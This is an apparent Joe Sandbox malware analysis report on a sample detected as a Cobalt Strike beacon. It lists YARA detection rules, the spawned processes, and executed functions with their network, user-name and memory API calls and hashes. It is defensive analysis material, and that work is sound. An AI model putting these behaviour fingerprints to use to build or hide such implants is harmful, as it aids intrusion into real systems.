Yara matches:	Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.1857226561.000001EA82D50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.1857226561.000001EA82D50000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1451999701.000001EA84640000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1451999701.000001EA84640000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:16:08
Start date:	17/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:16:11
Start date:	17/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3324 -s 560
Imagebase:	0x7ff65a660000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	18.8%
Total number of Nodes:	48
Total number of Limit Nodes:	7

Executed Functions

Function 000001EA846A2FA8 Relevance: 4.7, APIs: 3, Instructions: 190
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001EA846A316C: malloc.LIBCMT ref: 000001EA846A3188

GetUserNameA.ADVAPI32(?,?,?,?,?,?,?,-00000001,00000000,-00000001,00000000,00000003,000001EA8469BC2D), ref: 000001EA846A302F

Part of subcall function 000001EA8469D570: WSASocketA.WS2_32 ref: 000001EA8469D59E

strrchr.LIBCMT ref: 000001EA846A306D
_snprintf.LIBCMT ref: 000001EA846A311B

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: NameSocketUser_snprintfmallocstrrchr
String ID:
API String ID: 1789932928-0
Opcode ID: 2e9ec8b2910e25878f9df8f559a5a89517a6a7cf57a35c6dffffe13ea40c4c2d
Instruction ID: d2e315a662a49729b55f9e3607ffd277447769f166f1d8d8bb725578bcedc6c5
Opcode Fuzzy Hash: 2e9ec8b2910e25878f9df8f559a5a89517a6a7cf57a35c6dffffe13ea40c4c2d
Instruction Fuzzy Hash: AC516730718F480FEB58EB6CD455BAD76E2EB8D311F50457DE48AC3293DA74E8428742

Function 000001EA8469FC3E Relevance: 1.7, APIs: 1, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 000001EA8469FD0E

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
Instruction ID: 4ee17a982c1178df4f88d995938584c08d784bc963e8e435bde6a5fa4ec90c2c
Opcode Fuzzy Hash: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
Instruction Fuzzy Hash: FD513830204A858FC71CCE1CC4C1A367BE5FB85306B5A96BDD99BCB26BC970E842C681

Function 000001EA8469D570 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketA.WS2_32 ref: 000001EA8469D59E
WSAIoctl.WS2_32 ref: 000001EA8469D5EB
closesocket.WS2_32 ref: 000001EA8469D64A

Strings

_Cy, xrefs: 000001EA8469D5FD

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: IoctlSocketclosesocket
String ID: _Cy
API String ID: 3445158922-1085951347
Opcode ID: a92242532cdd76a831474aee6315f72e21cb2840c0ed84f4820b0f016089d1a4
Instruction ID: 08d445c52632ed8f5bb80e26a94147fa9a29236cddbceb648a8d704baf6f9736
Opcode Fuzzy Hash: a92242532cdd76a831474aee6315f72e21cb2840c0ed84f4820b0f016089d1a4
Instruction Fuzzy Hash: D931663061CA884BD754DF28D4947AEBBE1FBE8316F510A7EE84EC3192DB74D9418742

Function 000001EA8469CCD4 Relevance: 6.2, APIs: 4, Instructions: 239
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_snprintf.LIBCMT ref: 000001EA8469CD6D

Part of subcall function 000001EA846A9B9C: _errno.LIBCMT ref: 000001EA846A9BD3
Part of subcall function 000001EA846A9B9C: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846A9BDE

_snprintf.LIBCMT ref: 000001EA8469CDC7
_snprintf.LIBCMT ref: 000001EA8469CDDE
InternetCloseHandle.WININET ref: 000001EA8469CEA2

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _snprintf$CloseHandleInternet_errno_invalid_parameter_noinfo
String ID:
API String ID: 1304440831-0
Opcode ID: 70f0b2ca5af4e20061d35c5bca96a8600da3e808857c3dcbcfbd5e76383eb985
Instruction ID: acb60b98eff942731ac5e29b7e14b55389abc78c059bfe1f26d4bb9fe84a76e3
Opcode Fuzzy Hash: 70f0b2ca5af4e20061d35c5bca96a8600da3e808857c3dcbcfbd5e76383eb985
Instruction Fuzzy Hash: 2B71C431618B484BEB14EB18D885BEEB7E5FF94312F40467EE84BC3192DE34E9058782

Function 000001EA846B2E20 Relevance: 4.6, APIs: 3, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001EA846ABCE9), ref: 000001EA846B2E39
_malloc_crt.LIBCMT ref: 000001EA846B2EA0
free.LIBCMT ref: 000001EA846B2ED8

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings_malloc_crtfree
String ID:
API String ID: 3979818520-0
Opcode ID: e88322580736f3b16034725c4ae1da29b77a2a00c62e8cee0f5e99e705b42023
Instruction ID: 9d7d21f9ebf592295dde819fa223232a46fe71607e6c0dd3f76d68e0aac72b5c
Opcode Fuzzy Hash: e88322580736f3b16034725c4ae1da29b77a2a00c62e8cee0f5e99e705b42023
Instruction Fuzzy Hash: 04318430518F588FEB95DF199C8966977E1FB48711F8500ADE84AD3255D734D84287C3

Function 000001EA8469D054 Relevance: 3.2, APIs: 2, Instructions: 157
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 000001EA8469D111
InternetConnectA.WININET ref: 000001EA8469D17F

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: 44eed23d63fb0890720a6991a3b8969036aed2aac8f16f8d3a2fefc079dafb55
Instruction ID: fc7f89bab94d39c00b325090191593433ef981456016762d3422a6a5303f7c91
Opcode Fuzzy Hash: 44eed23d63fb0890720a6991a3b8969036aed2aac8f16f8d3a2fefc079dafb55
Instruction Fuzzy Hash: 0A519330218B444FEB48EF58D855BBD77E1FB88312F5054BEE447C3292DA78E9029782

Function 000001EA846A5FA4 Relevance: 1.3, APIs: 1, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE ref: 000001EA846A6005

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 035e5d67093643cf14d525f5db75048425cc0484b18a4d78cef9a8779f303f6a
Instruction ID: f535f8068965b2d26aa3a63d5ac7fc5105e1902a1d5f9599bf5d85474f9514b5
Opcode Fuzzy Hash: 035e5d67093643cf14d525f5db75048425cc0484b18a4d78cef9a8779f303f6a
Instruction Fuzzy Hash: 27118D30504F494BEBA4EB38D584FED79F1EF94352F9045FDE996C2181DA34D8849643

Function 00007FF76B8714D0 Relevance: .0, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1857537632.00007FF76B871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF76B870000, based on PE: true

Associated: 00000000.00000002.1857513966.00007FF76B870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857727158.00007FF76BB14000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857745915.00007FF76BB15000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857766025.00007FF76BB18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857783522.00007FF76BB19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857783522.00007FF76BC0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857903784.00007FF76BC60000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857924424.00007FF76BC63000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857941584.00007FF76BC66000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1857941584.00007FF76C030000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff76b870000_O6O7O5REot.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83278050681dc963d3761ab14dc63b0841cfbf804ff9fcdecaed7556a877fb0
Instruction ID: 121dee10c4d8744d46532b2da78fc9d4235d5103d13bb8d4a6b2cd2cdba75b17
Opcode Fuzzy Hash: c83278050681dc963d3761ab14dc63b0841cfbf804ff9fcdecaed7556a877fb0
Instruction Fuzzy Hash: 28B0122491820AC0E3007F19D88131C63706F06781FC05030C40C073B1CE3C60914B30

Non-executed Functions

Function 000001EA846AD384 Relevance: 32.5, APIs: 16, Strings: 2, Instructions: 1030COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001EA846AD3E5

Part of subcall function 000001EA846AC7E0: _getptd.LIBCMT ref: 000001EA846AC7F6
Part of subcall function 000001EA846AC7E0: __updatetlocinfo.LIBCMT ref: 000001EA846AC82B
Part of subcall function 000001EA846AC7E0: __updatetmbcinfo.LIBCMT ref: 000001EA846AC852

_errno.LIBCMT ref: 000001EA846AD3EA

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_fileno.LIBCMT ref: 000001EA846AD417

Part of subcall function 000001EA846AFDB4: _errno.LIBCMT ref: 000001EA846AFDBD
Part of subcall function 000001EA846AFDB4: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846AFDC8

write_multi_char.LIBCMT ref: 000001EA846ADA53
write_string.LIBCMT ref: 000001EA846ADA70
write_multi_char.LIBCMT ref: 000001EA846ADA8D
write_string.LIBCMT ref: 000001EA846ADAEC
write_multi_char.LIBCMT ref: 000001EA846ADB45
free.LIBCMT ref: 000001EA846ADB59
_isleadbyte_l.LIBCMT ref: 000001EA846ADC2A
write_char.LIBCMT ref: 000001EA846ADC40
write_char.LIBCMT ref: 000001EA846ADC61
_errno.LIBCMT ref: 000001EA846ADD64
_invalid_parameter_noinfo.LIBCMT ref: 000001EA846ADD6F

Strings

, xrefs: 000001EA846ADA27
@, xrefs: 000001EA846AD403

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID: $@
API String ID: 2950348734-1077428164
Opcode ID: a13eea343652d2125984793768277ab6f7899e45437fecb40c09c16223446c0b
Instruction ID: 4cafc5495b2e2110255ee790c41e413f53714e0193258be5f53036ee5759e108
Opcode Fuzzy Hash: a13eea343652d2125984793768277ab6f7899e45437fecb40c09c16223446c0b
Instruction Fuzzy Hash: 2D62E770918F998AF768DA58C445BEDB7F2FF95302FA411BDDC86C31D2DA24E8029643

Function 000001EA846AC888 Relevance: 30.8, APIs: 16, Strings: 1, Instructions: 1022COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000001EA846AC8E9

Part of subcall function 000001EA846AC7E0: _getptd.LIBCMT ref: 000001EA846AC7F6
Part of subcall function 000001EA846AC7E0: __updatetlocinfo.LIBCMT ref: 000001EA846AC82B
Part of subcall function 000001EA846AC7E0: __updatetmbcinfo.LIBCMT ref: 000001EA846AC852

_errno.LIBCMT ref: 000001EA846AC8EE

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

_fileno.LIBCMT ref: 000001EA846AC91B

Part of subcall function 000001EA846AFDB4: _errno.LIBCMT ref: 000001EA846AFDBD
Part of subcall function 000001EA846AFDB4: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846AFDC8

write_multi_char.LIBCMT ref: 000001EA846ACF4B
write_string.LIBCMT ref: 000001EA846ACF68
write_multi_char.LIBCMT ref: 000001EA846ACF85
write_string.LIBCMT ref: 000001EA846ACFE4
write_multi_char.LIBCMT ref: 000001EA846AD03D
free.LIBCMT ref: 000001EA846AD051
_isleadbyte_l.LIBCMT ref: 000001EA846AD122
write_char.LIBCMT ref: 000001EA846AD138
write_char.LIBCMT ref: 000001EA846AD159
_errno.LIBCMT ref: 000001EA846AD253
_invalid_parameter_noinfo.LIBCMT ref: 000001EA846AD25E

Strings

, xrefs: 000001EA846ACF1F

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 2950348734-3916222277
Opcode ID: c088f05b1c41bc5f40f79eacfff539743c0c701c9f0e97b8461aafc53f4e8f13
Instruction ID: 10ff2aabc6e384bb759ecbcc54e962888df84a991029be8c06cd40aa6a795336
Opcode Fuzzy Hash: c088f05b1c41bc5f40f79eacfff539743c0c701c9f0e97b8461aafc53f4e8f13
Instruction Fuzzy Hash: 0D62D430918F898EF768DA18D445BEDB6F1FF95302FA441BDDD87C71D2D624A802A683

Function 000001EA846A4820 Relevance: 13.3, APIs: 10, Instructions: 790COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 000001EA846A498D
_snprintf.LIBCMT ref: 000001EA846A4A4E
_snprintf.LIBCMT ref: 000001EA846A4A6B
_snprintf.LIBCMT ref: 000001EA846A4CC0
_snprintf.LIBCMT ref: 000001EA846A4DD0
_snprintf.LIBCMT ref: 000001EA846A4E8E
_snprintf.LIBCMT ref: 000001EA846A4F46
_snprintf.LIBCMT ref: 000001EA846A4CEA

Part of subcall function 000001EA846A9B9C: _errno.LIBCMT ref: 000001EA846A9BD3
Part of subcall function 000001EA846A9B9C: _invalid_parameter_noinfo.LIBCMT ref: 000001EA846A9BDE

_snprintf.LIBCMT ref: 000001EA846A4F5E
_snprintf.LIBCMT ref: 000001EA846A501C

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: b0045474d1749a7287ab64cdf2928e642e754940ba2aba6c48bf8ce747efe894
Instruction ID: f4c3c58e26f6e7b280b9c236c9ca9a391740a1436384af0baaf234db15660a2e
Opcode Fuzzy Hash: b0045474d1749a7287ab64cdf2928e642e754940ba2aba6c48bf8ce747efe894
Instruction Fuzzy Hash: F352C330518EC59BE759EB2CD802BE9F3F0FFA4306F80566DD98583152EB34E5869782

Function 000001EA846AA708 Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 000001EA846AA73C

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _initp_misc_winsig
String ID:
API String ID: 2710132595-0
Opcode ID: 8cbed0600e1a0cd3663791481dac497ddfdb5fe5119e382b5240cae51cc170ff
Instruction ID: b79acf1fd168ca5bd117f23237fa1b2c64c86ecaf3b2b094accf189c42c23888
Opcode Fuzzy Hash: 8cbed0600e1a0cd3663791481dac497ddfdb5fe5119e382b5240cae51cc170ff
Instruction Fuzzy Hash: 38A1F631619A099FFF84FFB5E888AAA37A2F768301711893B900AC3174DEBCD544CB41

Function 000001EA8469FDD6 Relevance: 1.5, APIs: 1, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b964d68e6518deaae8e71beb8172e02235f27dbd0a2c1c82e9933f31d250ba5e
Instruction ID: da82f8471da0790004cd1a47180ad8e22a4c85c9b3205592237d91ca7fd733d2
Opcode Fuzzy Hash: b964d68e6518deaae8e71beb8172e02235f27dbd0a2c1c82e9933f31d250ba5e
Instruction Fuzzy Hash: B081F030210A898FD76CDE1CC884B7577E1FB4530AF6582BDD95ACB2A6CA74E843CB41

Function 000001EA846B80B0 Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17d2024319736c82b3fb213a99edabd88fd33fc2dd5ac40e50a907bb907351a9
Instruction ID: 1685f20fd5d0a68f17e66812cc56112ee2fb2ade928a123f410aea07c7a7782e
Opcode Fuzzy Hash: 17d2024319736c82b3fb213a99edabd88fd33fc2dd5ac40e50a907bb907351a9
Instruction Fuzzy Hash: 68620B312286558FD31CCB1CC5B1B7AB7E1FB8A340F44896DE287CB692C639E945CB91

Function 000001EA846B7740 Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 337786be687ad5e8f5ffca3d815a0aab4912f658854966903adbd25a668e3634
Instruction ID: 0dd1569719c36d9d18d836694f2748d0202a1d33e7610e85480c6f20ac683357
Opcode Fuzzy Hash: 337786be687ad5e8f5ffca3d815a0aab4912f658854966903adbd25a668e3634
Instruction Fuzzy Hash: FB52ED312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE28ACB692C639E545CB91

Function 000001EA846B117C Relevance: 16.6, APIs: 11, Instructions: 108
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.LIBCMT ref: 000001EA846B11AE

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

__doserrno.LIBCMT ref: 000001EA846B11A5

Part of subcall function 000001EA846ABF60: _getptd_noexit.LIBCMT ref: 000001EA846ABF64

__doserrno.LIBCMT ref: 000001EA846B120B
_errno.LIBCMT ref: 000001EA846B1212
_invalid_parameter_noinfo.LIBCMT ref: 000001EA846B1276

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: cb682a384e9847fcd58d2a56c79d4b882a0455c15685cfbff69562d094508653
Instruction ID: b32eb0c6548f43558f4b0b58e0695164ede723b6aa00f70a91610fbc941f7db5
Opcode Fuzzy Hash: cb682a384e9847fcd58d2a56c79d4b882a0455c15685cfbff69562d094508653
Instruction Fuzzy Hash: 2031E7302087885EE715AF68D8927ED32E0FF42761F9902BDEC11872E7D670B8414693

Function 000001EA846B1F68 Relevance: 15.1, APIs: 10, Instructions: 93
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.LIBCMT ref: 000001EA846B1F93

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

__doserrno.LIBCMT ref: 000001EA846B1F8B

Part of subcall function 000001EA846ABF60: _getptd_noexit.LIBCMT ref: 000001EA846ABF64

__lock_fhandle.LIBCMT ref: 000001EA846B1FD7
_lseeki64_nolock.LIBCMT ref: 000001EA846B1FF0
_unlock_fhandle.LIBCMT ref: 000001EA846B2013

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: 94c223365c994b111b2dc29acc6dc628d4905ebb8eba9f35d440403a8ac84c36
Instruction ID: 939af978237bfc6d9a587e3d56869c38f63e88c1623a6e28090d236ee68f9179
Opcode Fuzzy Hash: 94c223365c994b111b2dc29acc6dc628d4905ebb8eba9f35d440403a8ac84c36
Instruction Fuzzy Hash: 5D212830208E880EF318AB68DC56BED32E0FF55323FD902ACF915871D7D66478418693

Function 000001EA846B1DF0 Relevance: 15.1, APIs: 10, Instructions: 89
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.LIBCMT ref: 000001EA846B1E1B

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

__doserrno.LIBCMT ref: 000001EA846B1E13

Part of subcall function 000001EA846ABF60: _getptd_noexit.LIBCMT ref: 000001EA846ABF64

__lock_fhandle.LIBCMT ref: 000001EA846B1E5F
_lseek_nolock.LIBCMT ref: 000001EA846B1E78
_unlock_fhandle.LIBCMT ref: 000001EA846B1E99

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: a09234805fd2a9c6af106032af68e44df28ba4d40962d0ef7be1a13687e388c4
Instruction ID: 6587c6a80a7dd3ce11b6da5cb85ea7854d4a9affe93cc10de6117be1042f3a12
Opcode Fuzzy Hash: a09234805fd2a9c6af106032af68e44df28ba4d40962d0ef7be1a13687e388c4
Instruction Fuzzy Hash: 4C210A316087840EE318A768DC92BFD36F0EF91322F9902BCE916871D7DBA078024693

Function 000001EA846B0794 Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846B07BF

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

__doserrno.LIBCMT ref: 000001EA846B07B7

Part of subcall function 000001EA846ABF60: _getptd_noexit.LIBCMT ref: 000001EA846ABF64

__lock_fhandle.LIBCMT ref: 000001EA846B0803
_unlock_fhandle.LIBCMT ref: 000001EA846B083D

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: ba9d0298e89461305872d42ae689c17141045664cbdffe6ae79e365563c6fb79
Instruction ID: d119d1bb9a17da5040c9b06074c2b7d0fee6f7de175ff64936a62e5bd8d3d0b3
Opcode Fuzzy Hash: ba9d0298e89461305872d42ae689c17141045664cbdffe6ae79e365563c6fb79
Instruction Fuzzy Hash: 9A212C306087840EF718AB68DC92BED76E0FF55322F9902ACED55871E7E6A47C0146D3

Function 000001EA846AFFB8 Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 000001EA846AFFD9

Part of subcall function 000001EA846ABFD0: _getptd_noexit.LIBCMT ref: 000001EA846ABFD4

__doserrno.LIBCMT ref: 000001EA846AFFD1

Part of subcall function 000001EA846ABF60: _getptd_noexit.LIBCMT ref: 000001EA846ABF64

__lock_fhandle.LIBCMT ref: 000001EA846B001D
_close_nolock.LIBCMT ref: 000001EA846B0030
_unlock_fhandle.LIBCMT ref: 000001EA846B0049

Memory Dump Source

Source File: 00000000.00000002.1857301582.000001EA84690000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EA84690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ea84690000_O6O7O5REot.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: bf5d551c04f4d35802267776e569c6e429d3d3e61a2abcb4f0089388d7e57412
Instruction ID: 3c944e56a04977bdaa0271f9386d8730c0dc28550b22cd896060c53097cf60d8
Opcode Fuzzy Hash: bf5d551c04f4d35802267776e569c6e429d3d3e61a2abcb4f0089388d7e57412
Instruction Fuzzy Hash: CB21F331508E884EE314AB64DC91BED7AA0FF56326F9905BCE91A871E3E6B4A8404753

